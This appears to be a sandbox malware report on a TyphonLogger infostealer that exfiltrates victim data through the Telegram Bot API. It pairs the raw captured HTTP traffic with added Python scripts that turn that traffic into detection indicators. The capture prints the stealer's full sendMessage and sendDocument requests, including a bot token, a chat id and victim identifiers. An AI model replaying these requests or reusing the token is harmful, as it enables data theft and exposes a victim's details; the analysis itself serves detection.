                                                                                      Host: api.telegram.org
                                                                                      Connection: Keep-Alive
                                                                                      2023-05-22 17:51:34 UTC | 766 kB | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 22 May 2023 17:51:34 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 651
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2023-05-22 17:51:34 UTC767INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 38 36 39 31 32 37 30 34 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 4d 74 72 61 64 65 20 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 6d 74 72 61 64 65 64 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 38 39 30 30 32 31 37 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 4d 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 72 61 64 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 6d 74 72 61 64 65 5f 30 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 38 34 37 37 37 38 39 34 2c 22 74
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":727,"from":{"id":5869127049,"is_bot":true,"first_name":"MMtrade Bot","username":"mmtraded_bot"},"chat":{"id":1689002171,"first_name":"MM","last_name":"Trade","username":"mmtrade_001","type":"private"},"date":1684777894,"t
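
The sample's whole C2 channel is the Telegram Bot API: every request is addressed to /bot<bot_id>:<secret>/<method>, the victim summary travels in the text parameter of sendMessage (session 4 above), and the stolen archive goes up as a sendDocument upload (the reply to the first upload closes the session at the top of this section; the second upload is the session that follows). The script below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses those two request lines and that JSON reply, copied verbatim from the capture, and reduces them to the indicators a SOC would act on. Two things it makes explicit: the bot_id:secret pair in the path is the bot's complete credential, so it is an indicator and a secret at the same time, and the API reply echoes the operator's bot and chat usernames back to the implant, which the malware never needed but the analyst does.

```python
"""Reduce the sample's Telegram Bot API traffic to C2 indicators.
Added example, not Joe Sandbox code or the sample's: the request lines and
the JSON reply are copied verbatim from the capture; the parsing is generic
to any implant that talks to api.telegram.org/bot<token>/<method>."""
import json
import re
from typing import List, Optional
from urllib.parse import parse_qs

# Request lines as captured (session 4 sendMessage, session 5 sendDocument).
SEND_MESSAGE = (
    "GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171"
    "&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user"
    "%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45"
    "%0A---------------------%0ABuild%20Tag:%20%0A---------------------"
    "%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded."
    "%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1"
)
SEND_DOCUMENT = "POST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1"
# Body of the 200 OK that answered the first sendDocument upload (end of session 2).
UPLOAD_REPLY = '{"ok":true,"result":{"message_id":723,"from":{"id":5869127049,"is_bot":true,"first_name":"MMtrade Bot","username":"mmtraded_bot"},"chat":{"id":1689002171,"first_name":"MM","last_name":"Trade","username":"mmtrade_001","type":"private"},"date":1684777828,"document":{"file_name":"C_UsersuserAppDataLocalTemp22_05_02023_20_48_14=user@12875.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIC02Rrq2Qk0DT3wE25fVtSdxEsoc_-AAIBEAAClttYU1vIT8UPeCrkLwQ","file_unique_id":"AgADARAAApbbWFM","file_size":778434}}}'

BOT_CALL = re.compile(
    r"^(?P<verb>GET|POST) /bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)"
    r"/(?P<method>\w+)(?:\?(?P<query>\S*))? HTTP/"
)
FIELD = re.compile(r"^([A-Za-z][A-Za-z ]*):\s(.*)$")  # "Key: value" lines of the notification


def parse_bot_call(request_line: str) -> Optional[dict]:
    """Split a Bot API request line into verb, token, method and decoded query."""
    m = BOT_CALL.match(request_line)
    if not m:
        return None
    call = m.groupdict()
    call["token"] = f"{call['bot_id']}:{call['secret']}"  # the full credential for this bot
    call["params"] = {k: v[0] for k, v in parse_qs(call["query"] or "", keep_blank_values=True).items()}
    return call


def victim_fields(text: str) -> dict:
    """Pull the 'Key: value' lines out of the sendMessage text; the dashed
    separators, the free-text lines and the t.me link do not match and are dropped."""
    fields = {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def parse_upload_reply(body: str) -> dict:
    """The API echoes the operator's bot and chat handles back to the implant."""
    r = json.loads(body)["result"]
    return {
        "bot_username": r["from"]["username"],
        "chat_id": str(r["chat"]["id"]),
        "chat_username": r["chat"].get("username"),
        "file_name": r["document"]["file_name"],
        "file_size": r["document"]["file_size"],
    }


def build_iocs(calls: List[dict], reply: Optional[dict] = None) -> dict:
    """Collapse the parsed traffic into the indicator set handed to the SOC."""
    iocs = {"hosts": {"api.telegram.org"}, "tokens": set(), "chat_ids": set(),
            "methods": set(), "operator_handles": set()}
    for c in calls:
        iocs["tokens"].add(c["token"])
        iocs["methods"].add(c["method"])
        if "chat_id" in c["params"]:
            iocs["chat_ids"].add(c["params"]["chat_id"])
    if reply:
        iocs["chat_ids"].add(reply["chat_id"])
        iocs["operator_handles"] |= {h for h in (reply["bot_username"], reply["chat_username"]) if h}
    return iocs


if __name__ == "__main__":
    calls = [c for c in (parse_bot_call(SEND_MESSAGE), parse_bot_call(SEND_DOCUMENT)) if c]
    print(victim_fields(calls[0]["params"]["text"]))
    print(build_iocs(calls, parse_upload_reply(UPLOAD_REPLY)))
```

Run as a script it prints the victim fields (user name, machine name, HWID, egress IP, empty build tag) and the indicator set. The same parse_bot_call works on reassembled request lines from a proxy or Zeek http log, and a match on the /bot<digits>:<secret>/ path shape from a process that is not a messenger client is itself a usable detection.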


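The sendDocument session below carries the archive as a single multipart/form-data part, so its first Data Raw dumps are the part header followed by the raw ZIP bytes. The script is an added example, not Joe Sandbox code or the sample's: it decodes those two hex dumps, parses the Content-Disposition line (both the quoted filename and the RFC 5987 filename*), then walks the ZIP local file headers at the start of the payload and stops where the capture cuts the third header short. One caveat it demonstrates: the report's Data Ascii column for the part-header line prints the profile name as user, but the raw bytes on the same line spell alfons, so the hex column is what was actually sent and is the one to decode when pulling indicators out of a sandbox capture.

```python
"""Decode the opening of the multipart body the sample POSTs to
api.telegram.org/bot<token>/sendDocument. Added example, not Joe Sandbox code:
the two hex strings are the session's "Data Raw" dumps copied verbatim; the
rest is generic multipart and ZIP header parsing that stops cleanly where the
capture is cut off."""
import re
import struct
import zlib
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import unquote

# "Data Raw" at the 768 kB mark: the Content-Disposition line of the document part.
PART_HEADER_HEX = "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 5b 32 32 2e 30 35 2e 30 32 30 32 33 20 32 31 2e 34 32 2e 31 33 5d 3d 61 6c 66 6f 6e 73 40 31 32 38 37 35 37 5f 31 42 32 36 39 33 38 36 45 30 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 54 65 6d 70 25 35 43 25 35 42 32 32 2e 30 35 2e 30 32 30 32 33 25 32 30 32 31 2e 34 32 2e 31 33 25 35 44 25 33 44 61 6c 66 6f 6e 73 25 34 30 31 32 38"
# The "Data Raw" dump that follows it: the first bytes of the uploaded ZIP.
ZIP_START_HEX = "50 4b 03 04 14 00 00 00 08 00 50 9e b6 56 01 8f 55 0c 3c 00 00 00 4d 00 00 00 17 00 24 00 32 32 2d 30 35 2d 32 30 32 33 20 32 32 2d 34 31 2d 32 32 2e 74 78 74 0a 00 20 00 00 00 00 00 01 00 18 00 3a 03 0d 58 21 8d d9 01 3a 03 0d 58 21 8d d9 01 3a 03 0d 58 21 8d d9 01 53 56 56 56 48 ad 28 c8 c9 2f 4a 2d 52 50 06 72 34 8c 8c 74 0d 4c 75 8d 0c 8c 8c 15 0c 2d ad 4c cd ad 0c 2c 34 b9 b8 b8 40 72 c9 c5 45 c5 c5 18 aa 8c 0c ad 4c 0c ac 8c 8c 34 b9 00 50 4b 03 04 14 00 00 00 00 00 68 9e b6 56 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 24 00 42 75 69 6c 64 54 61 67 2e 74 78 74 0a 00 20 00 00 00 00 00 01 00 18 00 b8 33 bd 71 21 8d d9 01 b8 33 bd 71 21 8d d9 01 b8 33 bd 71 21 8d d9 01 50 4b 03 04 14 00 00 00 00 00 64 9e b6 56 00 00 00 00 00 00 00 00 00 00 00 00 16 00"

LOCAL_SIG = b"PK\x03\x04"
LOCAL_FMT = "<4sHHHHHIIIHH"  # sig, version, flags, method, mtime, mdate, crc32, csize, usize, nlen, xlen
LOCAL_LEN = struct.calcsize(LOCAL_FMT)  # 30 bytes

@dataclass
class Entry:
    name: str
    method: int             # 0 = stored, 8 = deflate
    mtime: Tuple[int, ...]  # (Y, M, D, h, m, s) from the DOS fields, victim local time
    crc32: int
    csize: int
    usize: int
    data: Optional[bytes]   # None when the capture ends before the entry's data does

def parse_part_header(raw: bytes) -> dict:
    """Read name, filename and the RFC 5987 filename* of one multipart part header."""
    text = raw.decode("latin-1")
    name = re.search(r'(?:^|;\s*)name=("?)([^";]*)\1', text)
    fname = re.search(r'filename="([^"]*)"', text)
    star = re.search(r"filename\*=([\w-]+)'[^']*'(\S*)", text)
    return {
        "name": name.group(2) if name else None,
        "filename": fname.group(1) if fname else None,
        "filename_star": unquote(star.group(2), encoding=star.group(1)) if star else None,
        "truncated": not raw.endswith(b"\r\n"),  # a complete header line ends in CRLF
    }

def dos_datetime(mdate: int, mtime: int) -> Tuple[int, ...]:
    """Unpack the MS-DOS date and time words (2-second resolution, no timezone)."""
    return (1980 + (mdate >> 9), (mdate >> 5) & 0xF, mdate & 0x1F,
            mtime >> 11, (mtime >> 5) & 0x3F, (mtime & 0x1F) * 2)

def walk_local_headers(buf: bytes) -> Tuple[List[Entry], bool]:
    """Walk consecutive local file headers; the flag is True when the walk ran
    into the end of the capture rather than the end of the local-header area."""
    entries, pos = [], 0
    while buf[pos:pos + 4] == LOCAL_SIG:
        if pos + LOCAL_LEN > len(buf):
            return entries, True                      # the header itself is cut off
        (_, _, flags, method, mtime, mdate, crc, csize, usize,
         nlen, xlen) = struct.unpack_from(LOCAL_FMT, buf, pos)
        name_end = pos + LOCAL_LEN + nlen
        if name_end > len(buf):
            return entries, True
        name = buf[pos + LOCAL_LEN:name_end].decode("utf-8", "replace")
        when = dos_datetime(mdate, mtime)
        if flags & 0x8 and csize == 0:
            # Sizes live in a trailing data descriptor, so there is no way to skip ahead.
            entries.append(Entry(name, method, when, crc, 0, usize, None))
            return entries, True
        start, end = name_end + xlen, name_end + xlen + csize
        data = buf[start:end] if end <= len(buf) else None
        entries.append(Entry(name, method, when, crc, csize, usize, data))
        if data is None:
            return entries, True
        pos = end
    return entries, pos >= len(buf)

def inflate(entry: Entry) -> Optional[bytes]:
    """Recover an entry's plaintext when it was fully captured and the CRC checks out."""
    if entry.data is None:
        return None
    if entry.method == 0:
        out = entry.data
    elif entry.method == 8:
        try:
            out = zlib.decompress(entry.data, -zlib.MAX_WBITS)  # raw deflate, no zlib header
        except zlib.error:
            return None
    else:
        return None
    return out if len(out) == entry.usize and zlib.crc32(out) == entry.crc32 else None

def analyse() -> Tuple[dict, List[Entry], bool]:
    part = parse_part_header(bytes.fromhex(PART_HEADER_HEX))
    entries, truncated = walk_local_headers(bytes.fromhex(ZIP_START_HEX))
    return part, entries, truncated

if __name__ == "__main__":
    part, entries, truncated = analyse()
    print(part, "capture truncated:", truncated)
    for e in entries:
        print(e.name, e.method, e.mtime, e.csize, e.usize, inflate(e) is not None)
```

The first entry is a 60-byte deflate stream whose header promises 77 bytes and a CRC that the inflate step verifies before returning anything; the zero-byte BuildTag.txt matches the empty Build Tag: field in the sendMessage notification. Entry timestamps are DOS local time from the victim's clock, not the UTC of the capture.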
                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      5 | 192.168.2.5 | 49727 | 149.154.167.220 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      2023-05-22 17:51:45 UTC | 767 kB | OUT | POST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary="65055caf-f467-42d1-9569-ad240200e71b"
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 554301
                                                                                      Expect: 100-continue
                                                                                      2023-05-22 17:51:45 UTC | 767 kB | IN | HTTP/1.1 100 Continue
                                                                                      2023-05-22 17:51:45 UTC767OUTData Raw: 2d 2d 36 35 30 35 35 63 61 66 2d 66 34 36 37 2d 34 32 64 31 2d 39 35 36 39 2d 61 64 32 34 30 32 30 30 65 37 31 62 0d 0a
                                                                                      Data Ascii: --65055caf-f467-42d1-9569-ad240200e71b
                                                                                      2023-05-22 17:51:45 UTC768OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 5b 32 32 2e 30 35 2e 30 32 30 32 33 20 32 31 2e 34 32 2e 31 33 5d 3d 61 6c 66 6f 6e 73 40 31 32 38 37 35 37 5f 31 42 32 36 39 33 38 36 45 30 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 54 65 6d 70 25 35 43 25 35 42 32 32 2e 30 35 2e 30 32 30 32 33 25 32 30 32 31 2e 34 32 2e 31 33 25 35 44 25 33 44 61 6c 66 6f 6e 73 25 34 30 31 32 38
                                                                                      Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\Temp\[22.05.02023 21.42.13]=user@128757_1B269386E0.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5C%5B22.05.02023%2021.42.13%5D%3Duser%40128
                                                                                      2023-05-22 17:51:45 UTC768OUTData Raw: 50 4b 03 04 14 00 00 00 08 00 50 9e b6 56 01 8f 55 0c 3c 00 00 00 4d 00 00 00 17 00 24 00 32 32 2d 30 35 2d 32 30 32 33 20 32 32 2d 34 31 2d 32 32 2e 74 78 74 0a 00 20 00 00 00 00 00 01 00 18 00 3a 03 0d 58 21 8d d9 01 3a 03 0d 58 21 8d d9 01 3a 03 0d 58 21 8d d9 01 53 56 56 56 48 ad 28 c8 c9 2f 4a 2d 52 50 06 72 34 8c 8c 74 0d 4c 75 8d 0c 8c 8c 15 0c 2d ad 4c cd ad 0c 2c 34 b9 b8 b8 40 72 c9 c5 45 c5 c5 18 aa 8c 0c ad 4c 0c ac 8c 8c 34 b9 00 50 4b 03 04 14 00 00 00 00 00 68 9e b6 56 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 24 00 42 75 69 6c 64 54 61 67 2e 74 78 74 0a 00 20 00 00 00 00 00 01 00 18 00 b8 33 bd 71 21 8d d9 01 b8 33 bd 71 21 8d d9 01 b8 33 bd 71 21 8d d9 01 50 4b 03 04 14 00 00 00 00 00 64 9e b6 56 00 00 00 00 00 00 00 00 00 00 00 00 16 00
                                                                                      Data Ascii: PKPVU<M$22-05-2023 22-41-22.txt :X!:X!:X!SVVVH(/J-RPr4tLu-L,4@rEL4PKhV$BuildTag.txt 3q!3q!3q!PKdV
                                                                                      2023-05-22 17:51:45 UTC784OUTData Raw: ca b6 fb bc 5b 6a ee c6 ff b8 75 9a b2 7e c9 71 4f 65 35 d2 b5 73 97 89 f2 22 32 59 46 97 61 bd f4 c6 e6 c7 45 b3 ba 64 ca da 91 b0 49 d9 a1 d5 ea 69 61 7c e1 1b 3e d3 1b 36 e0 b8 27 83 94 1b 8e 84 82 ef 00 22 24 a9 7f db 73 62 bf 7c d2 dd 27 bd 5d 59 17 c8 a0 0b e1 32 89 d7 9d a5 bc 29 b2 86 7c 99 e9 58 d9 c6 55 87 7d 51 ab 2c 5d 3a f6 ce f6 b5 96 8a 91 3b 25 78 02 b9 9d bd ef 47 05 a6 7a 82 57 6f 07 7f 4c 5a fd 9b d2 c8 a5 02 93 8b 3a a5 e8 f5 df d9 3b a2 3a 83 7e d1 e0 ce 86 09 2a d0 26 e6 81 b8 63 2f bd c2 f9 66 22 f5 61 4a ac 31 e9 97 b6 81 0e fd 21 96 f5 52 cb 7e d2 c2 c7 dc 3a a1 8e 27 8d 56 8d 6d 06 b9 e3 1e 58 f3 9e e2 02 30 b6 95 70 7a b9 2e 21 14 01 99 13 48 1a 80 2c 98 14 21 40 58 28 08 44 36 28 59 30 ff 24 99 39 39 b6 97 3b 11 8d a0 2d 0a a0
                                                                                      Data Ascii: [ju~qOe5s"2YFaEdIia|>6'"$sb|']Y2)|XU}Q,]:;%xGzWoLZ:;:~*&c/f"aJ1!R~:'VmX0pz.!H,!@X(D6(Y0$99;-
                                                                                      2023-05-22 17:51:45 UTC800OUTData Raw: 87 a8 b1 6f b4 28 7d 1e 16 13 75 fe 2e 9b b8 ac 6a c2 e0 47 91 ef a7 70 21 63 0d ef 31 39 b8 ed 7b c9 d6 5a b5 91 c4 99 9c 68 84 6e 30 91 ce 7f 17 d5 61 8c a6 cd b0 07 75 42 6a d0 8f 1b f2 4d 98 b5 d1 7e e6 8f 41 24 19 b2 2d 18 49 06 18 3e 86 26 5b ba 02 25 43 9b 3f 0b 27 e9 60 7c d7 5e c3 87 58 2a 83 db 10 6f 85 83 de 4e bc 99 3b 6f 95 15 56 4d 62 fe c0 de 36 fa f3 dd 05 4b b6 72 c0 07 e0 2e 3d 4d 25 d2 83 cb af 2f 7c ee 75 4a 60 de 08 fa 53 d9 75 f9 32 96 4c 9e 28 fd 7e 97 bc 58 d5 ac b5 b0 6d f9 81 4e 22 89 f4 d8 2f 83 21 7d c4 3e dc 6e db 0a 9a ab b8 f6 c9 f3 34 12 ad 98 5a 51 34 6f 29 1f bd 67 f7 8d ea 57 99 75 a1 d1 d8 23 ec 3b f8 ab 8a cc af ec 34 13 5f f5 ee ea d1 01 bc 74 f7 e2 cd 7f f1 44 6a 7e 7e ef f5 24 4f d5 f9 df cb b9 ec d5 16 13 b8 d1 a9
                                                                                      Data Ascii: o(}u.jGp!c19{Zhn0auBjM~A$-I>&[%C?'`|^X*oN;oVMb6Kr.=M%/|uJ`Su2L(~XmN"/!}>n4ZQ4o)gWu#;4_tDj~~$O
                                                                                      2023-05-22 17:51:45 UTC816OUTData Raw: 88 82 61 f1 6b ef 12 a8 d7 de ec ae 4c 6b 5b 9c d6 5e 16 68 9e 68 88 37 66 9c e6 33 ee b9 85 af a8 75 af fb 63 bc 27 be a0 fd 5b 14 02 36 41 51 5e 73 a2 da 09 ba 48 b4 11 23 96 77 04 3b d2 18 69 94 54 42 80 81 d0 14 94 0e 63 f9 90 09 69 4c 70 40 df 60 26 c6 dd 1e 08 ce 71 af 3a e7 bb da a2 bb 8a 42 8d ca 56 7a 6c 18 f5 ed c6 64 51 1a 93 e7 d2 67 b7 f5 69 52 e7 e8 a0 ad 7e 7c 7e b0 ed c7 c7 9f 72 cb 0e 14 76 6d f3 ae 73 ed 66 fd a4 83 86 ad 69 fe 9d 8f 87 39 f0 98 b9 45 9c d3 d8 93 ba c0 3a 6d f7 46 16 5a 90 ed d5 04 cf d2 35 8b c3 50 7b ae fd 5b 32 05 37 ed 6e fc 59 49 4e b8 d1 86 17 2b c9 6c 15 85 bc 52 1e f0 15 33 f4 38 09 07 4b 9b 08 b6 74 6a 62 58 b5 21 d9 be 23 3e 3b e4 9d 32 70 20 8f 54 b2 20 ec 47 19 d8 df d8 3d 90 4c b8 41 2e ff 50 ee 56 2f 29 04
                                                                                      Data Ascii: akLk[^hh7f3uc'[6AQ^sH#w;iTBciLp@`&q:BVzldQgiR~|~rvmsfi9E:mFZ5P{[27nYIN+lR38KtjbX!#>;2p T G=LA.PV/)
                                                                                      2023-05-22 17:51:45 UTC832OUTData Raw: 91 fe e6 bc b7 21 1c 35 1e 83 44 8a 7f d7 1f b8 1e 83 f4 d9 d7 0e 37 b5 bb f3 a4 7a 22 78 cd 2e 19 49 be 09 fe 39 53 25 73 55 38 9a 76 16 7b 4b 01 3e 7c a0 af 58 80 c3 60 ec 9f 47 a0 27 be dc 82 fb a9 99 1e 39 0e ea f5 27 8b 59 73 0e e8 9e 10 2c 99 ff 03 39 ff b6 2d b0 2d 11 c6 10 e4 e5 c7 41 e0 4e 1c 9e b6 4c af 38 c7 73 5a 38 c0 a0 8f 35 d5 01 bd 74 4a b3 62 83 3a 3e 3d 56 bc 10 9d 4d 3f 5f 5e 13 d1 bf a0 3c b2 e0 d2 56 e5 75 49 af a3 68 50 df b5 ae 97 f4 e1 51 f6 3d fb ac 9c 95 3f f7 2e 1b 1f 4e 89 a9 37 15 be 2a 4e 4c dc a9 be 49 86 3e 38 e4 b9 f8 ab bd f7 35 ee cf 75 7b d9 a4 67 a2 9d ee 1a f7 24 3e 9e d4 ee 1c 35 6d 70 da 3a 0c 92 a0 78 46 2c 47 fc 51 68 ef f6 98 42 b7 23 50 8e 09 22 13 f1 f8 7c 00 a4 69 b9 78 ec 1d 49 55 7a a1 7c e6 2b 18 66 96 d4
                                                                                      Data Ascii: !5D7z"x.I9S%sU8v{K>|X`G'9'Ys,9--ANL8sZ85tJb:>=VM?_^<VuIhPQ=?.N7*NLI>85u{g$>5mp:xF,GQhB#P"|ixIUz|+f
                                                                                      2023-05-22 17:51:45 UTC848OUTData Raw: 43 a0 7b 04 d4 f6 bb 51 df d8 4b 4b 53 23 73 4d 5e 9c e2 fb 31 49 fe 71 98 b0 41 91 bc c5 9d af 2d 7f 71 3f 39 18 e1 ed fe a1 53 80 e0 b1 93 e6 1e 79 53 ed e6 b7 c5 bb c3 01 aa ac 6a b5 53 11 0c e2 11 e3 b9 b4 bc 76 8f f4 df 0c 2b 51 c7 9c 48 56 51 5d a5 5a 12 d0 1f 27 bb b2 25 9f ff 0e 6e 60 b7 af 7f aa d2 94 1e 5d 7a dd 6c 7a 80 d7 fc c1 8f 79 e6 f2 e8 6f f7 1e 4f e6 f9 94 f2 4a c8 50 bb cc eb 59 14 3f 35 6c 12 1c 91 6e 23 2f 6a e8 97 83 3f b6 0a 4f 0a d6 44 02 8f d4 c7 5b f8 f4 cf 9e b3 9f 39 6b 95 c4 c6 9b c4 a9 e2 ac ce e0 f6 e0 8b 84 04 30 f1 f6 ce 32 9a f1 5e cb e3 8e af bb 8b 41 2f 92 a6 3c 1e 56 4d 15 a9 71 bd bc 92 d3 9c db a5 45 75 7f 79 33 71 3f b5 37 17 96 c3 df c4 e5 16 fe f3 e6 ab 21 f3 53 1d cf 8f 37 06 36 b3 06 1b d4 74 2e 96 48 29 d9 7a
                                                                                      Data Ascii: C{QKKS#sM^1IqA-q?9SySjSv+QHVQ]Z'%n`]zlzyoOJPY?5ln#/j?OD[9k02^A/<VMqEuy3q?7!S76t.H)z
                                                                                      2023-05-22 17:51:45 UTC864OUTData Raw: ed d3 1c 76 b3 8a 3c 9c 1e c2 d2 75 9f c6 20 44 bb be 69 95 d9 bd 19 c0 dd 0e 3a d1 c8 43 66 7e 7a 55 4c b6 cf d9 ee 45 88 b2 4f d9 aa d8 ce d9 5f f3 53 5e 7c c4 a3 d8 f1 da c1 e0 4b 5c c7 99 1e 3f b2 09 78 ea 63 5b bf 58 94 5c cf 2a 35 b8 be c8 55 3f 44 17 33 6b d7 f5 64 5f 7c 21 80 51 f1 76 64 95 0f 41 99 62 70 12 bb f0 3e 6b f2 d9 d9 33 ab bc f6 aa e5 6e f1 af 99 db 5f 12 aa a5 47 1c f9 7f 0c 89 e5 bf 9d b9 ef 7e b7 e7 fe e6 93 b5 f9 3e 97 67 e2 26 a1 f6 41 6e db 23 32 85 18 a4 31 15 b8 14 73 2e ea b0 80 d2 4a 41 06 6e bf 36 5b cb 5a 23 3c 78 fa a8 f8 1f 1f f1 d6 01 cf 29 45 a1 db 3a 7c a3 b8 f3 70 06 1e 05 fd 1e db 8c 7b 2c d2 2b a5 d2 4d f5 6b 1c 31 fb b5 5c d3 ee bd 25 6a d8 c3 b3 a2 e9 a7 db b9 6f af ca f1 8e aa 24 e5 12 e4 3f 9c 0d 41 42 f3 73 5c
                                                                                      Data Ascii: v<u Di:Cf~zULEO_S^|K\?xc[X\*5U?D3kd_|!QvdAbp>k3n_G~>g&An#21s.JAn6[Z#<x)E:|p{,+Mk1\%jo$?ABs\
                                                                                      2023-05-22 17:51:45 UTC880OUTData Raw: f0 bd be 50 a7 f4 8a ed c7 c3 23 8a 26 ee c8 ae 21 ec 6a 6c 5a f3 ab 4b c0 02 93 3e 75 48 18 5f af 40 bf de c5 93 3f 10 1f 96 d8 b7 8c ad 33 0f a9 37 66 2a 12 1a 03 54 f9 8f a7 91 31 0e 57 b7 ba ae 93 ef d5 e4 1f 51 64 f9 04 3c 47 49 d6 8a cf ca d7 89 f0 0e 70 f7 1b 54 b0 12 54 20 f7 92 9b e9 89 ec 55 3c 77 52 c3 ee 5a 92 55 33 f2 24 7b 3d 90 0e d2 aa 78 6e 6e cf ff 39 35 b5 43 f9 96 dd bd 32 57 ad a5 b2 1f bc 73 3b 87 e5 f1 28 86 5a 10 e3 0f db 47 74 fc 2d 4e 0d 43 1e 21 4c 4f ba 25 87 70 f1 53 5f 2f 72 bb 35 85 ad bc 02 5e be df b8 04 54 16 a9 7a c7 22 ed 6e 85 cf 1b 7b c7 31 3f cf 74 b1 15 e0 c8 68 4e 61 0a b7 d2 94 a6 d1 ba b6 cf c6 2f 3f a5 25 a6 7d 0f 2d c8 13 f7 77 55 c0 d7 a5 32 e6 58 53 2b f8 7b 9d 42 01 52 0e c1 e7 76 da 72 05 33 36 e8 9f c1 6c
                                                                                      Data Ascii: P#&!jlZK>uH_@?37f*T1WQd<GIpTT U<wRZU3${=xnn95C2Ws;(ZGt-NC!LO%pS_/r5^Tz"n{1?thNa/?%}-wU2XS+{BRvr36l
                                                                                      2023-05-22 17:51:45 UTC896OUTData Raw: 82 db a8 a5 80 da bb 2f 52 5d c7 6e 71 fb 46 25 77 eb de 24 2e 60 2b 24 cc a9 75 0a 27 54 b5 dd 22 88 1f 3e f9 ae 47 8d 08 fc 59 53 3e 6a 8a 5f 79 e6 87 63 5d c2 76 be cb 25 7f cd 74 c6 39 43 5d 20 12 3b 61 4e 7e d4 5d 80 cc d5 4d 05 79 51 26 3f 75 59 84 ff fc d1 c8 5e 9e b6 95 32 7e 92 6b bc aa 89 ed c5 c1 10 a1 f4 de d0 ef 91 c4 5b 6f 36 2d f6 0f fa 93 cb 71 02 05 c9 e2 52 64 b2 d3 75 78 78 9a 7d 96 80 f8 7b 7f 09 1f fe ca a0 ce 7b bb 23 f8 4e 7c 5d e1 7e 68 ea de d0 59 ae b4 23 e9 79 b3 1e b0 45 c5 59 42 5c f5 33 bd f6 cd 06 e8 8b 16 d9 a4 d0 e2 f0 e8 17 e2 ef b5 6e 4e ad 8c 47 bd 21 c3 e3 71 01 cd f7 b1 ca d5 8b 7e e7 56 2f 9f e5 1f cb d5 95 4b ff 64 00 92 dc 67 72 ac 23 24 d7 1d aa dd f1 22 9d 69 be 32 ea 95 fe 89 04 12 79 5b 20 c6 7c 37 49 78 2e ef
                                                                                      Data Ascii: /R]nqF%w$.`+$u'T">GYS>j_yc]v%t9C] ;aN~]MyQ&?uY^2~k[o6-qRduxx}{{#N|]~hY#yEYB\3nNG!q~V/Kdgr#$"i2y[ |7Ix.
